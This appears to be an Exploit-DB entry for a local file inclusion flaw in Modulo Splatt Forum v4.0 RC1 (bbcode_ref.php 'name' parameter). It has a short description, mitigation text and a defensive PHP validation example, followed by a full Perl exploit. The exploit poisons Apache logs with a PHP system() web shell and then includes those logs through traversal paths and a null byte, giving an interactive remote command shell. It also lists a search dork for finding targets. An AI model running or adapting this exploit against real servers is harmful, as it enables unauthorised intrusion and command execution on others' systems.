Vendor: Splatt Forum
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Local File Inclusion
Product Name: Splatt Forum
Affected Version From: Modulo Splatt Forum v4.0 RC1
Affected Version To: Modulo Splatt Forum v4.0 RC1
Patch Exists: NO
Platforms Tested: Unknown

Modulo Splatt Forum v4.0 RC1 (bbcode_ref.php name) Local File Include Exploit

This exploit allows an attacker to include local files on the server by manipulating the 'name' parameter in the 'bbcode_ref.php' script of Modulo Splatt Forum v4.0 RC1. The vulnerable code is on lines 17 and 19 of the script, where the value of 'name' is assigned to '$module_name' and then concatenated into an include() path without validation. By including certain files, an attacker can potentially view sensitive information such as log files.

Mitigation:

Apply patches or updates provided by the vendor. Additionally, ensure that user input is properly validated and sanitized to prevent any malicious file inclusion.
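
The input validation described above, sketched as a hardened replacement for the two vulnerable lines quoted in the exploit header. This is an added example, not Splatt Forum code or a vendor patch; the helper name resolve_module_functions, the use of $_GET['name'] as the source of the value, and the modules directory location are assumptions.

```php
<?php
// Added example, not Splatt Forum code. Assumptions: the module name arrives
// as the "name" request parameter and each module lives in modules/<name>/.

// Vulnerable pattern quoted on this page (lines 17 and 19 of bbcode_ref.php):
//   $module_name = $name;
//   include("modules/".$module_name."/functions.php");

/**
 * Hypothetical helper: map a request-supplied module name to the absolute
 * path of its functions.php, or return null if the name is not acceptable.
 */
function resolve_module_functions($name, $modulesDir)
{
    // 1. Syntactic check: one path segment made of letters, digits, "_" and
    //    "-". This rejects "/", "\", "..", "%00"-style NUL bytes and dots.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // 2. Existence: resolve the real location of the module's functions.php.
    $base = realpath($modulesDir);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name
        . DIRECTORY_SEPARATOR . 'functions.php');

    // 3. Containment: after symlinks are resolved, the file must still be a
    //    regular file located inside the modules directory.
    if ($target === false || !is_file($target)
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Replacement for lines 17-19: read the parameter explicitly instead of
// relying on a global populated from the request.
$requested = isset($_GET['name']) ? $_GET['name'] : '';
$file = resolve_module_functions($requested, __DIR__ . '/modules'); // assumed path
if ($file === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid module');
}
include $file;
```

Rejecting the request outright, rather than stripping characters from the value and continuing, keeps traversal sequences and truncated paths from ever reaching include().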

Exploit-DB raw data:

#!/usr/bin/perl
# Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
# D.Script: http://sourceforge.net/projects/splattforum/
# V.Code
# $module_name = $name;   <<<-------- Line : 17
#
# include("modules/".$module_name."/functions.php");  <<<-------- Line : 19
# Dork: "Splatt Forum©"
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
use IO::Socket;
use LWP::Simple;
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3){
print "
##############################################################################
Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
          Usage: Gold.pl [VicTim] /modules/Forum/ [apachepath]
    Example: GolD.pl victim.com /modules/Forum/ ../logs/error.log
          Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
                 Discovered & Coded by : GolD_M = [Mahmood_ali]
##############################################################################
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."bbcode_ref.php?name=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2007-03-19]